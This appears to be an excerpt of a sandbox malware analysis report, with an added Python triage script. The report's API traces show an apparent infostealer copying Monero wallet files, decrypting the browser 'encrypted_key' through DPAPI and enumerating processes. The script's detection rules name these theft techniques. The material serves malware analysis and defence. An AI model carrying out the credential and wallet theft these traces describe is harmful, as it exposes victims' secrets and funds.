                               • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 356896f93b6580735b45af5daed8e8bac72e05fb209a1f82b6025f1f32bfcbae
                              • Instruction ID: f4c7a3354ffd2bb8901204f95fefe08807a3276adf2aa2eb1d7cc2d77fd7f726
                              • Opcode Fuzzy Hash: 356896f93b6580735b45af5daed8e8bac72e05fb209a1f82b6025f1f32bfcbae
                              • Instruction Fuzzy Hash: 39119EB1A88205EBD704CF94DD49FBBBBB8EB44B00F10425AFA05A7280D7785800DBA1
                              APIs
                              • StrStrA.SHLWAPI(014CE0B8,?,?,?,007A140C,?,014CE0B8,00000000), ref: 007A926C
                              • lstrcpyn.KERNEL32(009DAB88,014CE0B8,014CE0B8,?,007A140C,?,014CE0B8), ref: 007A9290
                              • lstrlen.KERNEL32(?,?,007A140C,?,014CE0B8), ref: 007A92A7
                              • wsprintfA.USER32 ref: 007A92C7
                              Strings
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: e32ea771ca4952235691b5cc87123d323c4819853b8c78710834ce704593ded7
                              • Instruction ID: 9e7a989dfe797bd26e89dac036d4106e8db1d6eb57979b68b22c2a048a472a03
                              • Opcode Fuzzy Hash: e32ea771ca4952235691b5cc87123d323c4819853b8c78710834ce704593ded7
                              • Instruction Fuzzy Hash: 09011A75545208FFCB04DFECC988EAE7BB9FB48364F108149F9098B340C635AAA1DB91
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007912B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007912BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 007912D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 007912F5
                              • RegCloseKey.ADVAPI32(?), ref: 007912FF
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: ec8459240ae93a5996f251a2450dd3878676fb011829f93ce630d4f47de71091
                              • Instruction ID: b96c09796556f9153be6142e02512038bd63584b5b35065bcb6d644890cbc6ea
                              • Opcode Fuzzy Hash: ec8459240ae93a5996f251a2450dd3878676fb011829f93ce630d4f47de71091
                              • Instruction Fuzzy Hash: 180131B9A54208BBDB00DFE0DC49FAEB7B8EB48701F00815AFE0597280D6749A519F51
                              APIs
                              Strings
                              Yara matches
                              Similarity
                              • API ID: String___crt$Type
                              • String ID:
                              • API String ID: 2109742289-3916222277
                              • Opcode ID: e7e1cf31f8d41aa7208df1b6939c9acf8345c8bae5190dcb4f4bd25f051ce964
                              • Instruction ID: 03d7c1127830e1813fb250e4b21b40613094831704e9b1d2f937c2a65b85da12
                              • Opcode Fuzzy Hash: e7e1cf31f8d41aa7208df1b6939c9acf8345c8bae5190dcb4f4bd25f051ce964
                              • Instruction Fuzzy Hash: 9A410C7110075CAEDB368B24CC85FFB7BEC9F86704F1445E8D58686182D279AA44CF60
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 007A6663
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                                • Part of subcall function 007AA9B0: lstrlen.KERNEL32(?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007AA9C5
                                • Part of subcall function 007AA9B0: lstrcpy.KERNEL32(00000000), ref: 007AAA04
                                • Part of subcall function 007AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 007AAA12
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 007A6726
                              • ExitProcess.KERNEL32 ref: 007A6755
                              Strings
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              • Opcode ID: bb131e5bd9a4f72613a3a3725ab12cedcec1415e900fce84cca40362d7615716
                              • Instruction ID: 7537062153cd47fb74e38d7d52519dec6c575cdd2d3189cccdcd3fb030c506cc
                              • Opcode Fuzzy Hash: bb131e5bd9a4f72613a3a3725ab12cedcec1415e900fce84cca40362d7615716
                              • Instruction Fuzzy Hash: C4314DB1C11208EBDB54EB90DC85BDE777CAF84300F404299F20966191DF786B88CF56
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,007B0E28,00000000,?), ref: 007A882F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007A8836
                              • wsprintfA.USER32 ref: 007A8850
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                              Strings
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: 05ea7e80b9c572422fec64e892c0ca7a91faf904b14e790c0598bf1571a2c49a
                              • Instruction ID: 341bc4113154016da1ec7d1aea4750ee317dae9c9162d226d4ad0a5426ccafe2
                              • Opcode Fuzzy Hash: 05ea7e80b9c572422fec64e892c0ca7a91faf904b14e790c0598bf1571a2c49a
                              • Instruction Fuzzy Hash: 3E2160B1A55204EFDB00DF94DD49FAEBBB8FB48701F104119FA05A7280C7799900DBA1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,007A951E,00000000), ref: 007A8D5B
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007A8D62
                              • wsprintfW.USER32 ref: 007A8D78
                              Strings
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              • Opcode ID: 475dbfe5179fc722e7dc1b4e3cc5f8ce039355032e2173451cf9feb6d29312b1
                              • Instruction ID: 66b5bd3b26fcdd7b9cb500e06fad6f05f93599cae1c7dcabea70c16329fd07f7
                              • Opcode Fuzzy Hash: 475dbfe5179fc722e7dc1b4e3cc5f8ce039355032e2173451cf9feb6d29312b1
                              • Instruction Fuzzy Hash: F1E0C2B0A95208FFC700DFD4DC0AE6D77BCEB44702F000095FD0987280DA759E60AB92
                              APIs
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                                • Part of subcall function 007AA9B0: lstrlen.KERNEL32(?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007AA9C5
                                • Part of subcall function 007AA9B0: lstrcpy.KERNEL32(00000000), ref: 007AAA04
                                • Part of subcall function 007AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 007AAA12
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                                • Part of subcall function 007A8B60: GetSystemTime.KERNEL32(007B0E1A,014CA850,007B05AE,?,?,007913F9,?,0000001A,007B0E1A,00000000,?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007A8B86
                                • Part of subcall function 007AA920: lstrcpy.KERNEL32(00000000,?), ref: 007AA972
                                • Part of subcall function 007AA920: lstrcat.KERNEL32(00000000), ref: 007AA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0079A2E1
                              • lstrlen.KERNEL32(00000000,00000000), ref: 0079A3FF
                              • lstrlen.KERNEL32(00000000), ref: 0079A6BC
                                • Part of subcall function 007AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 007AA7E6
                              • DeleteFileA.KERNEL32(00000000), ref: 0079A743
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 21ae1a864fa80d914cb2d19547dd9a776407756d056ac66c39ac6f445a0a5370
                              • Instruction ID: 945fe42fdde214661b13c524fefdc27fdefc275856ec2f292677084ba0825a33
                              • Opcode Fuzzy Hash: 21ae1a864fa80d914cb2d19547dd9a776407756d056ac66c39ac6f445a0a5370
                              • Instruction Fuzzy Hash: EFE1E472910108EBDB45FBA4DC9AEEE7378AF55300F508269F51772091EF3C6A49CB62
                              APIs
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                                • Part of subcall function 007AA9B0: lstrlen.KERNEL32(?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007AA9C5
                                • Part of subcall function 007AA9B0: lstrcpy.KERNEL32(00000000), ref: 007AAA04
                                • Part of subcall function 007AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 007AAA12
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                                • Part of subcall function 007A8B60: GetSystemTime.KERNEL32(007B0E1A,014CA850,007B05AE,?,?,007913F9,?,0000001A,007B0E1A,00000000,?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007A8B86
                                • Part of subcall function 007AA920: lstrcpy.KERNEL32(00000000,?), ref: 007AA972
                                • Part of subcall function 007AA920: lstrcat.KERNEL32(00000000), ref: 007AA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0079D481
                              • lstrlen.KERNEL32(00000000), ref: 0079D698
                              • lstrlen.KERNEL32(00000000), ref: 0079D6AC
                              • DeleteFileA.KERNEL32(00000000), ref: 0079D72B
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: fb2c02b27d909e0074f1d0d72ae6fba94fa1490b39ca5de3a4fc543811c8a6af
                              • Instruction ID: 6b86ea0e534b86d545e9306e65dfe0297f740dbf1582757674a52a07d698d17e
                              • Opcode Fuzzy Hash: fb2c02b27d909e0074f1d0d72ae6fba94fa1490b39ca5de3a4fc543811c8a6af
                              • Instruction Fuzzy Hash: A3912771910108EBCB45FBA4DC9AEEE7378AF95300F508269F50776091EF3C6A49CB62
                              APIs
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                                • Part of subcall function 007AA9B0: lstrlen.KERNEL32(?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007AA9C5
                                • Part of subcall function 007AA9B0: lstrcpy.KERNEL32(00000000), ref: 007AAA04
                                • Part of subcall function 007AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 007AAA12
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                                • Part of subcall function 007A8B60: GetSystemTime.KERNEL32(007B0E1A,014CA850,007B05AE,?,?,007913F9,?,0000001A,007B0E1A,00000000,?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007A8B86
                                • Part of subcall function 007AA920: lstrcpy.KERNEL32(00000000,?), ref: 007AA972
                                • Part of subcall function 007AA920: lstrcat.KERNEL32(00000000), ref: 007AA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0079D801
                              • lstrlen.KERNEL32(00000000), ref: 0079D99F
                              • lstrlen.KERNEL32(00000000), ref: 0079D9B3
                              • DeleteFileA.KERNEL32(00000000), ref: 0079DA32
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 0fe367807983ee17155bf588075c1407a37defc0ce30727b118bdf98a7b99f89
                              • Instruction ID: f7ac270fd7c48a6b83ab96f5ce4c82ee5e2415ba9a35824c2233067ec23c7868
                              • Opcode Fuzzy Hash: 0fe367807983ee17155bf588075c1407a37defc0ce30727b118bdf98a7b99f89
                              • Instruction Fuzzy Hash: B9811471910108EBCB45FBA4DC9AEEE7378AF95300F504229F507A6091EF3C6A59DB62
                              APIs
                                • Part of subcall function 007AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 007AA7E6
                                • Part of subcall function 007999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007999EC
                                • Part of subcall function 007999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00799A11
                                • Part of subcall function 007999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00799A31
                                • Part of subcall function 007999C0: ReadFile.KERNEL32(000000FF,?,00000000,0079148F,00000000), ref: 00799A5A
                                • Part of subcall function 007999C0: LocalFree.KERNEL32(0079148F), ref: 00799A90
                                • Part of subcall function 007999C0: CloseHandle.KERNEL32(000000FF), ref: 00799A9A
                                • Part of subcall function 007A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 007A8E52
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                                • Part of subcall function 007AA9B0: lstrlen.KERNEL32(?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007AA9C5
                                • Part of subcall function 007AA9B0: lstrcpy.KERNEL32(00000000), ref: 007AAA04
                                • Part of subcall function 007AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 007AAA12
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                                • Part of subcall function 007AA920: lstrcpy.KERNEL32(00000000,?), ref: 007AA972
                                • Part of subcall function 007AA920: lstrcat.KERNEL32(00000000), ref: 007AA982
                              • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,007B1580,007B0D92), ref: 0079F54C
                              • lstrlen.KERNEL32(00000000), ref: 0079F56B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                              • String ID: ^userContextId=4294967295$moz-extension+++
                              • API String ID: 998311485-3310892237
                              • Opcode ID: 7a4a297be2605bf4e500dfbc311f7746c6a026ef13534b43e080e436d5cf102e
                              • Instruction ID: a315c28f8d7f682d16097f85ea9754b7fbbf453a54dbf6fbdaef52188f68f32e
                              • Opcode Fuzzy Hash: 7a4a297be2605bf4e500dfbc311f7746c6a026ef13534b43e080e436d5cf102e
                              • Instruction Fuzzy Hash: AA51E171D10108FADB44FBA4DC5ADEE7378AF95300F408628F416A7191EF3C6A19CBA2
                              Strings
                              • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 007A718C
                              • sz, xrefs: 007A7111
                              • sz, xrefs: 007A72AE, 007A7179, 007A717C
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID: sz$sz$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                              • API String ID: 3722407311-3791023486
                              • Opcode ID: 8e21edf305c1ca45e05947355d544b45f4865bbe45b6c82deaeea4a46998f46e
                              • Instruction ID: cfe30da6f2fa4c9393c3a4e803a956222351560996f1ac4fcc8277ca03d09b2b
                              • Opcode Fuzzy Hash: 8e21edf305c1ca45e05947355d544b45f4865bbe45b6c82deaeea4a46998f46e
                              • Instruction Fuzzy Hash: E05175B1D0421CDBDB64EB90DC85BEEB3B4AF95304F1042A8E11577181EB786E88CF55
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: ac750f3f1ca889bdce9478f263c1d29589a616140bbd38136526640225f58c23
                              • Instruction ID: 9bff2585a0438863221f7713cda39d095d01b3408c73b73fadcf34b687d617aa
                              • Opcode Fuzzy Hash: ac750f3f1ca889bdce9478f263c1d29589a616140bbd38136526640225f58c23
                              • Instruction Fuzzy Hash: 074131B1D10109EFCB04EFA4D849AFEB774AF85304F008618F51677250EB79AA45CFA2
                              APIs
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                                • Part of subcall function 007999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007999EC
                                • Part of subcall function 007999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00799A11
                                • Part of subcall function 007999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00799A31
                                • Part of subcall function 007999C0: ReadFile.KERNEL32(000000FF,?,00000000,0079148F,00000000), ref: 00799A5A
                                • Part of subcall function 007999C0: LocalFree.KERNEL32(0079148F), ref: 00799A90
                                • Part of subcall function 007999C0: CloseHandle.KERNEL32(000000FF), ref: 00799A9A
                                • Part of subcall function 007A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 007A8E52
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00799D39
                                • Part of subcall function 00799AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ny,00000000,00000000), ref: 00799AEF
                                • Part of subcall function 00799AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00794EEE,00000000,?), ref: 00799B01
                                • Part of subcall function 00799AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ny,00000000,00000000), ref: 00799B2A
                                • Part of subcall function 00799AC0: LocalFree.KERNEL32(?,?,?,?,00794EEE,00000000,?), ref: 00799B3F
                                • Part of subcall function 00799B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00799B84
                                • Part of subcall function 00799B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00799BA3
                                • Part of subcall function 00799B60: LocalFree.KERNEL32(?), ref: 00799BD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              • Opcode ID: 88af9720d6453c46b66bbd1db648e42da607451127188b02addb8bf27a38a91a
                              • Instruction ID: 234c0d27588e5d268045124a64ff2bcc67bdbfc2ba4a9142d1b48b236fc20ef3
                              • Opcode Fuzzy Hash: 88af9720d6453c46b66bbd1db648e42da607451127188b02addb8bf27a38a91a
                              • Instruction Fuzzy Hash: 5A3110B5E10109EBDF04DBE8EC85AEFB7B8BB49304F54451DEA05A7241E7389A14CBA1
                              APIs
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,007B05B7), ref: 007A86CA
                              • Process32First.KERNEL32(?,00000128), ref: 007A86DE
                              • Process32Next.KERNEL32(?,00000128), ref: 007A86F3
                                • Part of subcall function 007AA9B0: lstrlen.KERNEL32(?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007AA9C5
                                • Part of subcall function 007AA9B0: lstrcpy.KERNEL32(00000000), ref: 007AAA04
                                • Part of subcall function 007AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 007AAA12
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                              • CloseHandle.KERNEL32(?), ref: 007A8761
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: fe3f02df61d758ac462ad5455d5fb3d4f3abe37436468be964108a3f78391cc6
                              • Instruction ID: 701adf380d723325944d1a81c28e502c2fd251e0c3934021a8aac2fce55abf63
                              • Opcode Fuzzy Hash: fe3f02df61d758ac462ad5455d5fb3d4f3abe37436468be964108a3f78391cc6
                              • Instruction Fuzzy Hash: E3314F71911218EBCB65DF54CC45FEEB778EF86700F104299F50AA61A0DB386A45CFA2
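                              Added triage example (our code, not Joe Sandbox output and not code from the sample): the function records above list raw `API.MODULE(args), ref: ADDR` lines, and an analyst normally wants them grouped into behaviours. The script below parses lines in exactly that format, groups them into three chains visible in these records (CopyFileA/DeleteFileA around `\Monero\wallet.keys`, the `"encrypted_key":"` search followed by CryptStringToBinaryA and CryptUnprotectData, and the CreateToolhelp32Snapshot/Process32First/Process32Next walk), and decodes the hex-dumped string at xref 007A718C, which is ASCII base64 of a JWT header. The sample lines are transcribed from the records above; the rule names and the constant meanings in the comments (CRYPT_STRING_BASE64 = 0x1, TH32CS_SNAPPROCESS = 0x2) are ours and are not stated by the report.

```python
"""Triage helper for Joe Sandbox per-function API annotations (added example, not Joe Sandbox code)."""
import base64
import re
from collections import defaultdict

# Constructed sample: lines transcribed from the function records in this report.
SAMPLE_LINES = [
    r"Part of subcall function 007AA9B0: lstrlen.KERNEL32(?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007AA9C5",
    r"CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0079D801",
    r"DeleteFileA.KERNEL32(00000000), ref: 0079DA32",
    r'StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00799D39',
    # 3rd argument 00000001 = CRYPT_STRING_BASE64 (our annotation): the matched value is base64-decoded
    r"Part of subcall function 00799AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ny,00000000,00000000), ref: 00799AEF",
    r"Part of subcall function 00799B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00799B84",
    # 1st argument 00000002 = TH32CS_SNAPPROCESS (our annotation): a process-list snapshot
    r"CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,007B05B7), ref: 007A86CA",
    r"Process32First.KERNEL32(?,00000128), ref: 007A86DE",
    r"Process32Next.KERNEL32(?,00000128), ref: 007A86F3",
]

# The hex-dumped string the report shows at xref 007A718C, copied verbatim.
HEX_DUMP_007A718C = ("65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 "
                     "62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30")

# Matches the report's own annotation shape, with or without the "Part of subcall function" prefix.
CALL_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-F]+)$"
)

# Rule name (ours) -> (APIs that must all be present, substring that must appear in some argument, or None).
RULES = {
    "chromium_local_state_master_key": ({"StrStrA", "CryptStringToBinaryA", "CryptUnprotectData"}, "encrypted_key"),
    "wallet_file_collection": ({"CopyFileA"}, "wallet.keys"),
    "process_enumeration": ({"CreateToolhelp32Snapshot", "Process32First", "Process32Next"}, None),
}


def parse_calls(lines):
    """Return one dict per parsable annotation line: api, module, args, ref address and subcall owner."""
    calls = []
    for line in lines:
        m = CALL_RE.match(line.strip())
        if not m:
            continue  # headings and non-API lines are skipped rather than treated as errors
        calls.append({
            "api": m["api"], "module": m["mod"], "ref": m["ref"], "subcall": m["sub"],
            "args": [a for a in m["args"].split(",") if a],
        })
    return calls


def triage(lines):
    """Map each matched rule name to the sorted ref addresses of the API calls that satisfied it."""
    calls = parse_calls(lines)
    seen_apis = {c["api"] for c in calls}
    all_args = " ".join(a for c in calls for a in c["args"])
    hits = defaultdict(list)
    for name, (apis, needle) in RULES.items():
        if apis <= seen_apis and (needle is None or needle in all_args):
            hits[name] = sorted(c["ref"] for c in calls if c["api"] in apis)
    return dict(hits)


def decode_hex_dump(hex_text):
    """Turn a space-separated hex dump into its ASCII text, then base64-decode that text."""
    ascii_text = bytes.fromhex(hex_text.replace(" ", "")).decode("ascii")
    padded = ascii_text + "=" * (-len(ascii_text) % 4)  # the dumped string carries no base64 padding
    return ascii_text, base64.b64decode(padded)


if __name__ == "__main__":
    for rule, refs in triage(SAMPLE_LINES).items():
        print(f"{rule}: {', '.join(refs)}")
    text, decoded = decode_hex_dump(HEX_DUMP_007A718C)
    print(f"{text} -> {decoded!r}")
```

                              Running it on the transcribed lines reports all three chains with their ref addresses, and the 007A718C string decodes to `{ "typ": "JWT", "alg": "EdDSA" }`. The rules key only on API names and argument substrings that the report prints, so the same parser runs unchanged over a full exported function list; what it does not see is control flow, so a chain hit means "these calls co-occur in the listed functions", not "this path executes".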
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,007B0E00,00000000,?), ref: 007A79B0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007A79B7
                              • GetLocalTime.KERNEL32(?,?,?,?,?,007B0E00,00000000,?), ref: 007A79C4
                              • wsprintfA.USER32 ref: 007A79F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: b8baadbfd839ca0f4c0df8060d2657e6d25bb806241f410b10000c5da9b8b66a
                              • Instruction ID: 1dada26927cd9d07beeb8ec361a42532b45c98488cc789c7556184002f0e8770
                              • Opcode Fuzzy Hash: b8baadbfd839ca0f4c0df8060d2657e6d25bb806241f410b10000c5da9b8b66a
                              • Instruction Fuzzy Hash: D6112AB2958118ABCB14DFC9DD45BBEB7F8FB4CB11F10421AFA05A2280D3395950D7B5
                              APIs
                              • __getptd.LIBCMT ref: 007AC74E
                                • Part of subcall function 007ABF9F: __amsg_exit.LIBCMT ref: 007ABFAF
                              • __getptd.LIBCMT ref: 007AC765
                              • __amsg_exit.LIBCMT ref: 007AC773
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 007AC797
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
